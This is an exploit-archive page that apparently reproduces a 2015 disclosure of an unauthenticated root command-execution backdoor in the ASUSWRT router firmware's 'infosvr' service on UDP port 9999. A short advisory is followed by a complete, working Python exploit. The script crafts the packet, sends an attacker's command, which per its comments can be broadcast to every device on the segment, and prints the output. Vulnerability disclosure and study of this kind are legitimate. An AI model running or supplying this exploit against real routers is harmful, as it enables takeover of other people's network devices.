what you don't know can hurt you

ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution

ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution
Posted Jan 5, 2015
Authored by Friedrich Postelstorfer

ASUSWRT version 3.0.0.4.376_1071 suffers from a remote command execution vulnerability. A service called "infosvr" listens on port 9999 on the LAN bridge. Normally this service is used for device discovery using the "ASUS Wireless Router Device Discovery Utility", but this service contains a feature that allows an unauthenticated user on the LAN to execute commands less than or equal to 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr. "iboxcom.h" is in asuswrt/release/src/router/shared.

tags | exploit, remote, root
MD5 | 5ec3e85958335b910a0bf2c90f373d64

ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution

Change Mirror Download
#!/usr/bin/env python3

# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution
# Date: 2014-10-11
# Vendor Homepage: http://www.asus.com/
# Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip
# Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip
# Tested Version: 3.0.0.4.376_1071-g8696125
# Tested Device: RT-N66U

# Description:
# A service called "infosvr" listens on port 9999 on the LAN bridge.
# Normally this service is used for device discovery using the
# "ASUS Wireless Router Device Discovery Utility", but this service contains a
# feature that allows an unauthenticated user on the LAN to execute commands
# <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.
# "iboxcom.h" is in asuswrt/release/src/router/shared.
#
# Affected devices may also include wireless repeaters and other networking
# products, especially the ones which have "Device Discovery" in their features
# list.
#
# Using broadcast address as the IP address should work and execute the command
# on all devices in the network segment, but only receiving one response is
# supported by this script.

import sys, os, socket, struct


PORT = 9999

if len(sys.argv) < 3:
print('Usage: ' + sys.argv[0] + ' <ip> <command>', file=sys.stderr)
sys.exit(1)


ip = sys.argv[1]
cmd = sys.argv[2]

enccmd = cmd.encode()

if len(enccmd) > 237:
# Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server.
print('Values over 237 will give rise to undefined behaviour.', file=sys.stderr)
sys.exit(1)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', PORT))
sock.settimeout(2)

# Request consists of following things
# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
# PacketType [byte] ; NET_PACKET_TYPE_CMD
# OpCode [word] ; NET_CMD_ID_MANU_CMD
# Info [dword] ; Comment: "Or Transaction ID"
# MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp
# Password [byte[32]] ; Not checked at all
# Length [word]
# Command [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable

packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).ljust(512, b'\x00')

sock.sendto(packet, (ip, PORT))


# Response consists of following things
# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
# PacketType [byte] ; NET_PACKET_TYPE_RES
# OpCode [word] ; NET_CMD_ID_MANU_CMD
# Info [dword] ; Equal to Info of request
# MacAddress [byte[6]] ; Filled in for us
# Length [word]
# Result [byte[420]] ; Actually returns that amount

while True:
data, addr = sock.recvfrom(512)

if len(data) == 512 and data[1] == 22:
break

length = struct.unpack('<H', data[14:16])[0]
s = slice(16, 16+length)
sys.stdout.buffer.write(data[s])

sock.close()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    1 Files
  • 2
    Dec 2nd
    16 Files
  • 3
    Dec 3rd
    17 Files
  • 4
    Dec 4th
    23 Files
  • 5
    Dec 5th
    11 Files
  • 6
    Dec 6th
    10 Files
  • 7
    Dec 7th
    1 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    15 Files
  • 10
    Dec 10th
    30 Files
  • 11
    Dec 11th
    8 Files
  • 12
    Dec 12th
    20 Files
  • 13
    Dec 13th
    6 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close